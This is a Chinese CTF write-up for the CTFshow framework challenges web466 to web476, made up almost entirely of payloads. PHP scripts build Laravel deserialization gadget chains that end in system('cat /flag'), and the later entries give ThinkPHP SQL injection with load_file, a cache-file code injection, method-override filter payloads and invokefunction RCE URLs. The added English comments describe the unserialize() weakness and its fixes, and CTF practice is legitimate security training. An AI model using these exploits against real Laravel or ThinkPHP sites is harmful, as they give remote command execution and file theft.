• CTFSHOW框架复现篇


    web466

    反序列化入口格式:/admin/<序列化串的 base64 编码>

    参考文章
    https://xz.aliyun.com/t/11002
    payload

    <?php
    // web466 exercise: builds a two-object graph out of stub classes and prints it as
    // base64(serialize(...)). The stubs copy only the namespaced class names and the
    // property names; they define no behaviour of their own.
    //
    // NOTE(review): which framework methods later read these properties is not visible
    // in this file (see the referenced article). The precondition stated on the page is a
    // route that base64-decodes a path segment and unserializes it. The durable fix is on
    // that side: do not call unserialize() on request data (use json_decode(), or pass
    // ['allowed_classes' => false] / an explicit class list).
    // Detection hint: base64 of a serialized PHP object starts with "Tzo" ("O:<digit>").
    namespace Illuminate\Validation {
        // Stub with the same fully-qualified name as the framework class.
        class Validator {
           // Public, so it is serialized under its plain name; the constructor overwrites it.
           public $extensions = [];
           public function __construct() {
                // One entry: empty-string key mapped to the callable name 'system'.
                $this->extensions = ['' => 'system'];
           }
        }
    }
    
    namespace Illuminate\Broadcasting {
        use  Illuminate\Validation\Validator;
        // Outer object of the graph; both properties are protected, matching the names used here.
        class PendingBroadcast {
            protected $events;
            protected $event;
            public function __construct($cmd)
            {
                // $events holds the Validator stub, $event holds the string passed in.
                $this->events = new Validator();
                $this->event = $cmd;
            }
        }
        // Emits the encoded graph; the argument is the exercise's command string.
        echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
    }
    ?>
    

    web467

    参考文章https://xz.aliyun.com/t/9478

    <?php
    // web467 exercise: prints base64(serialize(...)) of a PendingBroadcast stub whose
    // $events is a Dispatcher stub. Only class and property names are mirrored here; no
    // method of either class is defined in this file.
    //
    // NOTE(review): how the target consumes $listeners is not shown here (see the
    // referenced article). The issue being exercised is unserialize() on request-controlled
    // data; restricting allowed_classes or switching to a data-only format removes the
    // entry point regardless of which gadget classes are installed.
    namespace Illuminate\Broadcasting
    {
        use  Illuminate\Events\Dispatcher;
        // Outer object of the graph.
        class PendingBroadcast
        {
            protected $events;
            protected $event;
            public function __construct($cmd)
            {
                // The same string is stored twice: as the Dispatcher's listener key and as $event.
                $this->events = new Dispatcher($cmd);
                $this->event=$cmd;
            }
        }
        // Dispatcher is declared further down in the file; presumably this works because
        // PHP declares unconditional top-level classes at compile time — confirm if reordering.
        echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
    }
    
    
    namespace Illuminate\Events
    {
        // Stub with the same fully-qualified name as the framework class.
        class Dispatcher
        {
           protected $listeners;
           public function __construct($event){
               // Map keyed by the given string; its listener list holds the callable name 'system'.
               $this->listeners=[$event=>['system']];
           }
        }
    }
    

    web468

    参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html

    <?php
    // web468 exercise: prints base64(serialize(...)) of a PendingBroadcast stub whose
    // $events is a ChannelManager stub. The stubs carry property values only.
    //
    // NOTE(review): the framework code that reads $defaultChannel / $customCreators / $app
    // is not visible here (see the referenced article). The server-side weakness is
    // unserialize() on request data; restrict allowed_classes or use a data-only format.
    namespace Illuminate\Broadcasting
    {
    	use Illuminate\Notifications\ChannelManager;
    	// Outer object; unlike the earlier variants it sets only $events.
    	class PendingBroadcast
    	{
    		protected $events;
    		public function __construct($cmd)
    		{
    			$this->events = new ChannelManager($cmd);
    		}
    	}
    	// Build the graph and emit it base64-encoded.
    	$seri = new PendingBroadcast('cat /flag');
    	echo base64_encode(serialize($seri));
    }
    
    namespace Illuminate\Notifications
    {
    	// Stub with the same fully-qualified name as the framework class.
    	class ChannelManager
    	{
    		protected $app;
    		protected $defaultChannel;
    		protected $customCreators;
    		public function __construct($cmd)
    		{
    			// 'yu22x' is an arbitrary label; it only has to match the key in $customCreators.
    			$this->defaultChannel = 'yu22x';
    			// Creator map: that label mapped to the callable name 'system'.
    			$this->customCreators = array('yu22x' => 'system'); 
    			// $app holds the command string rather than an application object.
    			$this->app = $cmd;
    		}
    	}
    }
    ?>
    

    发送payload后看下源代码即可。

    web469|web470

    参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html

    <?php
    // web469 / web470 exercise: prints base64(serialize(...)) of a three-level graph,
    // PendingBroadcast -> Faker\ValidGenerator -> Faker\DefaultGenerator. The stubs carry
    // property values only; no framework behaviour is defined in this file.
    //
    // NOTE(review): the classes here come from a bundled third-party library namespace
    // (Faker), not the framework itself — a reminder that every autoloadable class is part
    // of the deserialization attack surface. How the target uses these properties is not
    // shown here (see the referenced article). The fix is to keep request data out of
    // unserialize(), or restrict allowed_classes.
    namespace Illuminate\Broadcasting
    {
    	use Faker\ValidGenerator;
    	// Outer object; sets only $events.
    	class PendingBroadcast
    	{
    		protected $events;
    		public function __construct($cmd)
    		{
    			$this->events = new ValidGenerator($cmd);
    		}
    	}
    	// Build the graph and emit it base64-encoded.
    	$seri = new PendingBroadcast('cat /flag');
    	echo base64_encode(serialize($seri));
    }
    
    namespace Faker
    {
    	// Same namespace as DefaultGenerator, so this import is not needed for name resolution.
    	use Faker\DefaultGenerator;
    	// Stub with the same fully-qualified name as the library class.
    	class ValidGenerator
    	{
    		protected $maxRetries;
    		protected $validator;
    		protected $generator;
    		public function __construct($cmd)
    		{
    			// Inner object that stores the command string.
    			$this->generator = new DefaultGenerator($cmd);
    			// Large retry ceiling; its role in the real class is not visible here.
    			$this->maxRetries = 10000000;
    			// Validator slot set to the callable name 'system'.
    			$this->validator = 'system';
    		}
    		
    	}
    }
    
    namespace Faker
    {
    	// Innermost stub: a single protected property holding the command string.
    	class DefaultGenerator
    	{
    		protected $default;
    		public function __construct($cmd)
    		{
    			$this->default = $cmd;
    		}
    	}
    }
    ?>
    

    web471

    参考文章http://www.136.la/jingpin/show-180114.html#POC1_46

    <?php
    // web471 exercise: prints base64(serialize(...)) of a PendingBroadcast stub holding a
    // Bus\Dispatcher stub in $events and a QueuedCommand stub in $event. All values are
    // hard-coded in the stubs; the constructors take no arguments.
    //
    // NOTE(review): the framework code that reads $queueResolver and $connection is not
    // visible here (see the referenced article). The server-side weakness is unserialize()
    // on request data; restrict allowed_classes or use a data-only format such as JSON.
    namespace Illuminate\Broadcasting
    {
        use Illuminate\Bus\Dispatcher;
        use Illuminate\Foundation\Console\QueuedCommand;
        // Outer object of the graph.
        class PendingBroadcast
        {
            protected $events;
            protected $event;
    
            public function __construct()
            {
                $this->events = new Dispatcher();
                $this->event = new QueuedCommand();
            }
    
        }
    }
    
    namespace Illuminate\Foundation\Console
    {
        // Stub whose only state is a public $connection holding the command string.
        class QueuedCommand
        {
            public $connection = 'cat /flag';
        }
    }
    
    namespace Illuminate\Bus
    {
    
        // Stub with the same fully-qualified name as the framework class.
        class Dispatcher
        {
            protected $queueResolver;
    
            public function __construct()
            {
                // Resolver slot set to the callable name 'system' instead of a closure.
                $this->queueResolver='system';
            }
    
        }
    }
    
    // Global namespace: construct the graph and emit it base64-encoded.
    namespace
    {
    
        use Illuminate\Broadcasting\PendingBroadcast;
    
        echo base64_encode(serialize(new PendingBroadcast()));
    }
    

    web472

    参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
    payload

    <?php
    // web472 exercise: same overall shape as the web471 listing (PendingBroadcast holding a
    // Bus\Dispatcher and an event object), but the stubs take their values as constructor
    // arguments and the event object is a BroadcastEvent stub.
    //
    // NOTE(review): the framework code that reads $queueResolver and $connection is not
    // visible here (see the referenced article). The server-side weakness is unserialize()
    // on request data; restrict allowed_classes or use a data-only format such as JSON.
    namespace Illuminate\Broadcasting{
     
    // Imported but never referenced in this namespace block.
    use Illuminate\Contracts\Events\Dispatcher;
     
    // Outer object of the graph; stores whatever it is given.
    class PendingBroadcast
    {
     protected $event;
     protected $events;
        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }
    }
    namespace Illuminate\Bus{
    // Stub with the same fully-qualified name as the framework class.
    class Dispatcher
    {
     protected $queueResolver;
        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }
     
    }
    }
    namespace Illuminate\Broadcasting{
    // Stub whose only state is a public $connection.
    class BroadcastEvent
    {
     public $connection;
     public function __construct($connection)
        {
            $this->connection = $connection;
        }
      }
    }
    // Global namespace: wire the three stubs together and emit the graph base64-encoded.
    namespace{
     // $c carries the command string, $a carries the callable name 'system'.
     $c = new Illuminate\Broadcasting\BroadcastEvent('cat /flag');
     $a = new Illuminate\Bus\Dispatcher('system');
     $b = new Illuminate\Broadcasting\PendingBroadcast($a,$c);
     echo base64_encode(serialize($b));
    }
    

    web473

    参考文章https://www.cnblogs.com/litlife/p/11273652.html
    试了几个报错函数,其中 exp 可用。
    payload
    index.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1

    web474

    参考文章https://blog.csdn.net/rfrder/article/details/114599310

    public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
    接着访问
    runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php
    
    

    web475

    s=cat /flag&_method=__construct&method=POST&filter[]=system
    
    aaaa=cat /flag&_method=__construct&method=GET&filter[]=system
    
    _method=__construct&method=GET&filter[]=system&get[]=cat /flag
    
    c=cat /flag&f=calc&_method=filter
    

    web476

    ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
    
    ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
    
    ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
    
  • 原文地址:https://blog.csdn.net/miuzzx/article/details/125487518